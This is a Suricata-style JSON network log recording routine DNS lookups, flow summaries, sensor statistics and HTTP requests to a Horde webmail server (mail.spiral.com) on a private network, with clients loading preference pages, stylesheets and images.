{"timestamp":"2020-02-29T00:00:03.906662+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16131,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:04.000257+0000","flow_id":1959100616671748,"event_type":"flow","src_ip":"192.168.10.122","src_port":53493,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:02.459268+0000","end":"2020-02-28T23:55:02.570517+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:04.000559+0000","flow_id":2248594297295235,"event_type":"flow","src_ip":"192.168.10.122","src_port":34133,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:01.889219+0000","end":"2020-02-28T23:55:02.000453+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:04.125348+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620}} {"timestamp":"2020-02-29T00:00:06.000412+0000","event_type":"stats","stats":{"uptime":13658,"capture":{"kernel_packets":131656,"kernel_drops":0},"decoder":{"pkts":131666,"bytes":91548095,"invalid":175,"ipv4":130251,"ipv6":8,"ethernet":131666,"raw":0,"null":0,"sll":0,"tcp":125327,"udp":4735,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2642,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2658,"synack":2649,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1689,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2157,"failed_udp":106},"tx":{"http":4364,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2233}},"flow_mgr":{"closed_pruned":2614,"new_pruned":15,"est_pruned":2207,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":173458,"memcap":0}}} {"timestamp":"2020-02-29T00:00:06.130347+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20083,"tx_id":1}} {"timestamp":"2020-02-29T00:00:07.959552+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":18}} {"timestamp":"2020-02-29T00:00:09.000169+0000","flow_id":1174723640053537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6516,"start":"2020-02-28T23:59:02.216865+0000","end":"2020-02-28T23:59:07.421832+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:09.131516+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34682,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34777,"tx_id":0}} {"timestamp":"2020-02-29T00:00:09.579471+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62651,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:09.744651+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:00:11.000743+0000","flow_id":1483686392296336,"event_type":"flow","src_ip":"192.168.10.122","src_port":41143,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:10.848784+0000","end":"2020-02-28T23:55:10.956521+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.001125+0000","flow_id":953872111526551,"event_type":"flow","src_ip":"192.168.10.122","src_port":46841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:10.746135+0000","end":"2020-02-28T23:55:10.857663+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.906251+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:00:11.917081+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48664,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:12.138061+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798}} {"timestamp":"2020-02-29T00:00:12.183305+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:00:12.186770+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:00:12.188718+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:00:12.224277+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:00:12.224594+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:00:12.226518+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:00:12.265633+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:00:12.265685+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:00:12.310542+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:00:12.311477+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:00:14.000165+0000","event_type":"stats","stats":{"uptime":13666,"capture":{"kernel_packets":131707,"kernel_drops":0},"decoder":{"pkts":131749,"bytes":91582877,"invalid":175,"ipv4":130334,"ipv6":8,"ethernet":131749,"raw":0,"null":0,"sll":0,"tcp":125405,"udp":4740,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2645,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2661,"synack":2652,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1693,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2159,"failed_udp":106},"tx":{"http":4372,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2235}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2209,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":174216,"memcap":0}}} {"timestamp":"2020-02-29T00:00:14.001000+0000","flow_id":1593959677759463,"event_type":"flow","src_ip":"192.168.10.122","src_port":32817,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:13.724967+0000","end":"2020-02-28T23:55:13.836542+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:16.606407+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58242,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":10,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.229309+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} {"timestamp":"2020-02-29T00:00:17.231489+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52626,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.316883+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:00:17.808975+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57151,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:18.056280+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318}} {"timestamp":"2020-02-29T00:00:18.115962+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":0}} {"timestamp":"2020-02-29T00:00:18.119305+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} 